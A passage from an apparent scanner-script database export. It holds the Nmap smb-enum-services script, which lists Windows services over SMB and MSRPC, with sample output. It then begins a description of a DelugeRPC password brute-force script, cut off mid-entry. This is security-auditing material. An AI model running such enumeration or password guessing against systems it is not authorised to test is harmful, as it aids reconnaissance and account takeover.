SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | MSDTC:\n-- | display_name: Distributed Transaction Coordinator\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_INTERROGATE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_PARAMCHANGE\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | NtFrs:\n-- | display_name: File Replication\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | RDSessMgr:\n-- | display_name: Remote Desktop Help Session Manager\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | rpcapd:\n-- | display_name: Remote Packet Capture Protocol v.0 (experimental)\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | RpcLocator:\n-- | display_name: Remote Procedure Call (RPC) Locator\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | Spooler:\n-- | display_name: Print Spooler\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_INTERROGATE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_PARAMCHANGE\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | swprv:\n-- | display_name: Microsoft Software Shadow Copy Provider\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | SysmonLog:\n-- | display_name: Performance Logs and Alerts\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | TlntSvr:\n-- | display_name: Telnet\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | TPVCGateway:\n-- | display_name: TP VC Gateway Service\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | Tssdis:\n-- | display_name: Terminal Services Session Directory\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | UMWdf:\n-- | display_name: Windows User Mode Driver Framework\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | UPS:\n-- | display_name: Uninterruptible Power Supply\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | vds:\n-- | display_name: Virtual Disk Service\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | VGAuthService:\n-- | display_name: VMware Alias Manager and Ticket Service\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | VMTools:\n-- | display_name: VMware Tools\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_INTERROGATE\n-- | SERVICE_CONTROL_NETBINDDISABLE\n-- | SERVICE_CONTROL_PAUSE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_PARAMCHANGE\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | vmvss:\n-- | display_name: VMware Snapshot Provider\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | VMware Physical Disk Helper Service:\n-- | display_name: VMware Physical Disk Helper Service\n-- | state:\n-- | SERVICE_PAUSE_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_RUNNING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- | SERVICE_CONTROL_CONTINUE\n-- | SERVICE_CONTROL_NETBINDADD\n-- | SERVICE_CONTROL_STOP\n-- | SERVICE_CONTROL_NETBINDENABLE\n-- | VSS:\n-- | display_name: Volume Shadow Copy\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- | controls_accepted:\n-- |\n-- | WmiApSrv:\n-- | display_name: WMI Performance Adapter\n-- | state:\n-- | SERVICE_STOPPED\n-- | SERVICE_STOP_PENDING\n-- | SERVICE_CONTINUE_PENDING\n-- | SERVICE_PAUSED\n-- | type:\n-- | SERVICE_TYPE_WIN32\n-- | SERVICE_TYPE_WIN32_OWN_PROCESS\n-- |_ controls_accepted:\n--\n-- @xmloutput\n--\n-- <table key=\"ALG\">\n-- <elem key=\"display_name\">Application Layer Gateway Service</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- </table>\n-- </table>\n-- <table key=\"ClipSrv\">\n-- <elem key=\"display_name\">ClipBook</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"COMSysApp\">\n-- <elem key=\"display_name\">COM+ System Application</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- </table>\n-- </table>\n-- <table key=\"Dfs\">\n-- <elem key=\"display_name\">Distributed File System</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"ImapiService\">\n-- <elem key=\"display_name\">IMAPI CD-Burning COM Service</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"IsmServ\">\n-- <elem key=\"display_name\">Intersite Messaging</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"LicenseService\">\n-- <elem key=\"display_name\">License Logging</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"mnmsrvc\">\n-- <elem key=\"display_name\">NetMeeting Remote Desktop Sharing</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"MSDTC\">\n-- <elem key=\"display_name\">Distributed Transaction Coordinator</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_INTERROGATE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- <elem>SERVICE_CONTROL_PARAMCHANGE</elem>\n-- </table>\n-- </table>\n-- <table key=\"NtFrs\">\n-- <elem key=\"display_name\">File Replication</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"RDSessMgr\">\n-- <elem key=\"display_name\">Remote Desktop Help Session Manager</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"rpcapd\">\n-- <elem key=\"display_name\">Remote Packet Capture Protocol v.0 (experimental)</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"RpcLocator\">\n-- <elem key=\"display_name\">Remote Procedure Call (RPC) Locator</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"Spooler\">\n-- <elem key=\"display_name\">Print Spooler</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_INTERROGATE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- <elem>SERVICE_CONTROL_PARAMCHANGE</elem>\n-- </table>\n-- </table>\n-- <table key=\"swprv\">\n-- <elem key=\"display_name\">Microsoft Software Shadow Copy Provider</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"SysmonLog\">\n-- <elem key=\"display_name\">Performance Logs and Alerts</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"TlntSvr\">\n-- <elem key=\"display_name\">Telnet</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"TPVCGateway\">\n-- <elem key=\"display_name\">TP VC Gateway Service</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"Tssdis\">\n-- <elem key=\"display_name\">Terminal Services Session Directory</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"UMWdf\">\n-- <elem key=\"display_name\">Windows User Mode Driver Framework</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"UPS\">\n-- <elem key=\"display_name\">Uninterruptible Power Supply</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"vds\">\n-- <elem key=\"display_name\">Virtual Disk Service</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"VGAuthService\">\n-- <elem key=\"display_name\">VMware Alias Manager and Ticket Service</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- </table>\n-- </table>\n-- <table key=\"VMTools\">\n-- <elem key=\"display_name\">VMware Tools</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_INTERROGATE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDDISABLE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- <elem>SERVICE_CONTROL_PAUSE</elem>\n-- <elem>SERVICE_CONTROL_PARAMCHANGE</elem>\n-- </table>\n-- </table>\n-- <table key=\"vmvss\">\n-- <elem key=\"display_name\">VMware Snapshot Provider</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"VMware Physical Disk Helper Service\">\n-- <elem key=\"display_name\">VMware Physical Disk Helper Service</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_PAUSE_PENDING</elem>\n-- <elem>SERVICE_RUNNING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- <elem>SERVICE_CONTROL_NETBINDADD</elem>\n-- <elem>SERVICE_CONTROL_CONTINUE</elem>\n-- <elem>SERVICE_CONTROL_NETBINDENABLE</elem>\n-- <elem>SERVICE_CONTROL_STOP</elem>\n-- </table>\n-- </table>\n-- <table key=\"VSS\">\n-- <elem key=\"display_name\">Volume Shadow Copy</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n-- <table key=\"WmiApSrv\">\n-- <elem key=\"display_name\">WMI Performance Adapter</elem>\n-- <table key=\"state\">\n-- <elem>SERVICE_STOPPED</elem>\n-- <elem>SERVICE_PAUSED</elem>\n-- <elem>SERVICE_STOP_PENDING</elem>\n-- <elem>SERVICE_CONTINUE_PENDING</elem>\n-- </table>\n-- <table key=\"type\">\n-- <elem>SERVICE_TYPE_WIN32_OWN_PROCESS</elem>\n-- <elem>SERVICE_TYPE_WIN32</elem>\n-- </table>\n-- <table key=\"controls_accepted\">\n-- </table>\n-- </table>\n\nauthor = \"Rewanth Cool\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\",\"intrusive\",\"safe\"}\n\nportrule = shortport.port_or_service({445, 139}, \"microsoft-ds\", \"tcp\", \"open\")\n\naction = function(host, port)\n\n local open_result\n local close_result\n local bind_result\n local result\n\n local status, smbstate = msrpc.start_smb(host, msrpc.SVCCTL_PATH)\n status, bind_result = msrpc.bind(smbstate, msrpc.SVCCTL_UUID, msrpc.SVCCTL_VERSION, nil)\n\n if(status == false) then\n smb.stop(smbstate)\n return nil, stdnse.format_output(false, bind_result)\n end\n\n -- Open the service manager\n stdnse.debug2(\"Opening the remote service manager\")\n\n status, open_result = msrpc.svcctl_openscmanagerw(smbstate, host.ip, 0x02000000)\n\n if(status == false) then\n smb.stop(smbstate)\n return nil, stdnse.format_output(false, open_result)\n end\n\n\n --@param dwservicetype The type of services to be enumerated.\n -- Lookup table for dwservicetype is as follows:\n -- SERVICE_DRIVER - 0x0000000B\n -- SERVICE_FILE_SYSTEM_DRIVER - 0x00000002\n -- SERVICE_KERNEL_DRIVER - 0x00000001\n -- SERVICE_WIN32 - 0x00000030\n -- SERVICE_WIN32_OWN_PROCESS - 0x00000010 (default)\n -- SERVICE_WIN32_SHARE_PROCESS - 0x00000020\n local dwservicetype = 0x00000010\n\n --@param dwservicestate The state of the services to be enumerated.\n -- Lookup table for dwservicetype is as follows:\n -- SERVICE_ACTIVE - 0x00000001\n -- SERVICE_INACTIVE - 0x00000002\n -- SERVICE_STATE_ALL - 0x00000003 (default)\n local dwservicestate = 0x00000001\n\n -- Fetches service name, display name and service status of every service.\n status, result = msrpc.svcctl_enumservicesstatusw(smbstate, open_result[\"handle\"], dwservicetype, dwservicestate)\n\n if(status == false) then\n smb.stop(smbstate)\n return nil, stdnse.format_output(false, result)\n end\n\n -- Close the service manager\n stdnse.debug2(\"Closing the remote service manager\")\n\n status, close_result = msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])\n\n smb.stop(smbstate)\n\n return result\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:07", "description": "Performs brute force password auditing against the DelugeRPC daemon.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee 